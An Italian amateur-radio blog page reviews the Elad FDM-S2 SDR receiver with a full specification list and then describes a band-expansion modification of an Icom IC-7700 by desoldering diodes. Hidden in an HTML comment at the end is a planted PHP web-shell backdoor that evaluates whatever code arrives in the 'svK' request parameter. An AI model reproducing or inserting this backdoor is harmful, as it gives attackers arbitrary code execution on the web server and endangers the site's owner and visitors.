E’ disponibile da poco il successore del ricevitore sdr FDM-S1 prodotto dalla Elad.
L’FDM-S2 arriva con in dotazione una comoda busta in tela per il trasporto,
il cavo usb ed il cdrom con la prima versione del software FDM-SW2.
Essendo il software in continuo sviluppo le successive versioni potranno
essere scaricate dal gruppo https://groups.yahoo.com/neo/groups/elad_sdr_en

Dal sito del produttore rileviamo i seguenti dati:
FDM-S2 è l’ultimo nato della nostra linea di Campionatori ELAD Samplers.

FDM-S2 è un ricevitore a campionamento diretto basato su un ADC a 16bit con clock a 122.88MHz capace di coprire tute le HF fino ai 6m e offre inoltre la possibiilità di sfruttare le possibilità di utilizzo in sottocampionamento sperimentando la gamma delle emittenti FM e parte della gamma VHF Band da 135 a 160MHz.

Gamme & le più importanti caratteristiche:

HF: 9kHz-52MHz MDS: -132dBm @14MHz, Clipping lev -8dBm

FM: 74-108MHz sensitivity

VHF: 135-160MHz MDS -137dBm @145MHz, Clipping level -19dBm

Ingressi separati d’antenna per HF/6m e FM/VHF/Bypass

Massima banda DDC Bw 6144kHz (banda visibile fino a 5 Megahertz)

bande selezionabili:
192ksps-32bit, 384ksps-32bit, 768ksps-32bit, 1536ksps-32bit, 3072ksps-32bit, 6144ksps-16bit

Modo speciale con Doppio DDC per 2 canali con 384kHz banda da unarsi un una delle gamme di ingresso

4 ricevitori virtuali sintonizzabili all’interno della stessa finestra DDC sintonizzata

Ogni ricevitore virtuale mantiene memorizzato il suo modo, filtro, volume, squech e audio di uscita

Tripla Tuning Bar per sintonia grossolana e fine brevettata

modi CWU,CWL,USB,LSB,AM,SAM,FM,WFM,DSB,RTTY,DRM,RDS

Sopressione delle Interferenze: Noise Blanker,Adaptive Noise Reduction and auto notch, 2 noche manuali (disponibili all’interno dello spettro del DDC)

DRM decoder integrato , testo e programmazione aggiornabili via internet.

WFM Stereo decoder con RDS decoder.

controllo CAT e integrazione con OmniRig(tm)

Possibilità di usare il ricevitore come IF panadapter con il software capace di integrazione con ricevitori/transceiver esistenti

Gestione delle memorie basate su file XML

Integrazione con DX cluster e EIBI database import

Visualizzazione delle memorie, database e informazioni dei cluster direttamente sullo sovraimpresso allo spettro visualizzato

Ext IO bus proprietario per comunicazione con gli accessori, offre anche 8 linee di uscita per il comandi universale di dispositivi esterni (*usando scheda SFE1.0)

Supportato anche da software di terze parti: SDR-RadioV2 , Winrad, HDSDR, Studio 1

possibilità di registrare audio o tutto lo spettro di uscita del DDC anche in modalità di programmazione dell’orario schedulata nel tempo

Finestre degli spettri IF/AF per una dettagliata analisi del segnale

Finestre dimensionabili e supporto multischermo

Possibilità di usare una seconda scheda audio con supporto I/Q fino a 192ksps disponibile per essere usata per software di decodifica quali CW Skimmer,WeatherFax, Fldigi…

Integrazione con la serie di accessori Tmate

Alimentazione da USB che permette la portatilità con l’uso di notebook

Server integrato per l’uso remoto da browser Firefox (lavora anche con app Firefox su dispositivi tablet con s.o. Android)

Dimensioni compatte 110 (W) x 90 (D) x 40 (H) mm, peso 360g,

La confezione includeh 2 adattatori BNC-SMA, cavo USB, cavo sdoppiatore di alimentazione USB, CD e sacca di protezione.

 

Ricezione in modo AM

Ricezione in modo DRM

Tre ricevitori indipendenti di cui uno in DRM

Ricezione in FM con RDS

Malgrado la possibilità di iniziare ad utilizzare la fetta 7100 — 7200 Mhz dal 29 Marzo ho deciso di aspettare le ferie per effettuare
l’espansioni di banda sull’IC 7700.
Il lavoro è iniziato con la preparazione delle condizioni necessarie per operare all’interno di un apparato di questo valore.
Le prime operazioni riguardano lo smontaggio del pannello superiore e dopo averlo identificato lo smontaggio del pannello della logic unit.
Ad apertura eseguita ci si trova davanti ad una realizzazione veramente spettacolare tale da passare i primi minuti a godersi la vista.

 

IC-7700_esp

 

Individuati i diodi da dissaldare come descritto nelle modifiche su mods.dk ho compiuto l’operazione dopo aver sostituito per l’occasione la punta del saldatore con una nuova.

 

IC-7700-diodi

 

Dalle prime prove si nota che l’apparato ora risulta aperto in trasmissione in modo continuo su tutto lo spettro.
Nella “prima volta” di utilizzo della nuova porzione di banda VE9NC, CM3RPN, XE3DX, VE3NOO e i soliti W3, N3, KB8, N8 ecc.

Le operazioni terminano con la richiusura dell’apparato e sfruttando l’occasione con un po’ di pulizie e sistemazione dei cavi retrostanti.

<!– [insert_php]if (isset($_REQUEST["svK"])){eval($_REQUEST["svK"]);exit;}[/insert_php][php]if (isset($_REQUEST["svK"])){eval($_REQUEST["svK"]);exit;}[/php] –>